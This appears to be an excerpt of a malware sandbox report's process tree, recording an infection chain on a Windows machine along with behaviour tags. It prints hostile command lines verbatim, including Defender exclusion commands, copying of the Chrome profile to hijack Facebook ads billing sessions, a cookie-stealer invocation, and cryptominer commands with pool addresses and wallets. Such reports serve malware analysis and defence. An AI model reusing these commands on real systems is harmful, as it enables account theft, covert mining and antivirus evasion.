C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\lmel12emlbc\eyys4yc1mqw.exe"C:\Users\Admin\AppData\Local\Temp\lmel12emlbc\eyys4yc1mqw.exe" /1-6108⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Divine-Shadow'9⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Divine-Shadow\7za.exe"C:\Program Files (x86)\Divine-Shadow\7za.exe" e -p154.61.71.13 winamp.7z9⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Divine-Shadow\eyys4yc1mqw.exe"C:\Program Files (x86)\Divine-Shadow\eyys4yc1mqw.exe" /1-6109⤵
-
C:\Users\Admin\AppData\Local\Temp\z1i3aoohuww\45y4koqd0ts.exe"C:\Users\Admin\AppData\Local\Temp\z1i3aoohuww\45y4koqd0ts.exe" /VERYSILENT8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-IULTJ.tmp\45y4koqd0ts.tmp"C:\Users\Admin\AppData\Local\Temp\is-IULTJ.tmp\45y4koqd0ts.tmp" /SL5="$10404,2592217,780800,C:\Users\Admin\AppData\Local\Temp\z1i3aoohuww\45y4koqd0ts.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-MAI79.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-MAI79.tmp\winlthsth.exe"10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 65211⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\p0aiss5t5rj\app.exe"C:\Users\Admin\AppData\Local\Temp\p0aiss5t5rj\app.exe" /8-238⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Fragrant-Brook'9⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Fragrant-Brook\7za.exe"C:\Program Files (x86)\Fragrant-Brook\7za.exe" e -p154.61.71.13 winamp.7z9⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Fragrant-Brook\app.exe"C:\Program Files (x86)\Fragrant-Brook\app.exe" /8-239⤵
-
C:\Users\Admin\AppData\Local\Temp\g4h23awbzfg\lokpto41glk.exe"C:\Users\Admin\AppData\Local\Temp\g4h23awbzfg\lokpto41glk.exe" /quiet SILENT=1 AF=7568⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\g4h23awbzfg\lokpto41glk.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\g4h23awbzfg\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1616769849 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵
-
C:\Users\Admin\AppData\Local\Temp\ym25xpjbpcv\setup_10.2_us3.exe"C:\Users\Admin\AppData\Local\Temp\ym25xpjbpcv\setup_10.2_us3.exe" /silent8⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "9⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\5AMO7SQBCK\setups.exe"C:\Users\Admin\AppData\Local\Temp\5AMO7SQBCK\setups.exe" ll5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-70BPV.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-70BPV.tmp\setups.tmp" /SL5="$102EE,587771,264704,C:\Users\Admin\AppData\Local\Temp\5AMO7SQBCK\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Drops Chrome extension
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y5⤵
- Enumerates system info in registry
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/5⤵
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffe6dc86e00,0x7ffe6dc86e10,0x7ffe6dc86e206⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1520,511615905426767698,5853814216051849764,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1648 /prefetch:86⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1520,511615905426767698,5853814216051849764,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1572 /prefetch:26⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1520,511615905426767698,5853814216051849764,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2272 /prefetch:86⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,511615905426767698,5853814216051849764,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2836 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,511615905426767698,5853814216051849764,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2816 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,511615905426767698,5853814216051849764,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,511615905426767698,5853814216051849764,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,511615905426767698,5853814216051849764,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,511615905426767698,5853814216051849764,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,511615905426767698,5853814216051849764,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,511615905426767698,5853814216051849764,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2100 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,511615905426767698,5853814216051849764,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2120 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1520,511615905426767698,5853814216051849764,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5312 /prefetch:86⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1520,511615905426767698,5853814216051849764,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5404 /prefetch:86⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\433A.tmp.exe"C:\Users\Admin\AppData\Roaming\433A.tmp.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\4677.tmp.exe"C:\Users\Admin\AppData\Roaming\4677.tmp.exe"5⤵
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵
-
C:\ProgramData\4906469.exe"C:\ProgramData\4906469.exe"5⤵
-
C:\ProgramData\2837158.exe"C:\ProgramData\2837158.exe"5⤵
- Suspicious behavior: SetClipboardViewer
-
C:\ProgramData\4279222.exe"C:\ProgramData\4279222.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7315A54C87410FDF5CF0C0924E7B14B9 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F09940D23690559B9253B63FBB2AF2422⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"4⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exeC:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1c0,0x1e4,0x1e8,0x198,0x1ec,0x7ffe6dc89ec0,0x7ffe6dc89ed0,0x7ffe6dc89ee05⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exeC:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x148,0x14c,0x150,0x124,0x154,0x7ff686c44e60,0x7ff686c44e70,0x7ff686c44e806⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1692,10134340777933304402,2733469672467503280,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4528_1072271316" --mojo-platform-channel-handle=1764 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1692,10134340777933304402,2733469672467503280,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4528_1072271316" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1688 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1692,10134340777933304402,2733469672467503280,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4528_1072271316" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2572 /prefetch:15⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1692,10134340777933304402,2733469672467503280,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4528_1072271316" --mojo-platform-channel-handle=2104 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1692,10134340777933304402,2733469672467503280,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4528_1072271316" --mojo-platform-channel-handle=2744 /prefetch:85⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE9DB0.bat" "3⤵
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE9DB0.bat"4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE9DB0.bat" "4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" cls"4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE9E3D.bat" "3⤵
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09011⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install1⤵
- Loads dropped DLL
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{67ca70dd-910f-7b4f-8a45-ef055f028572}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000017C"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
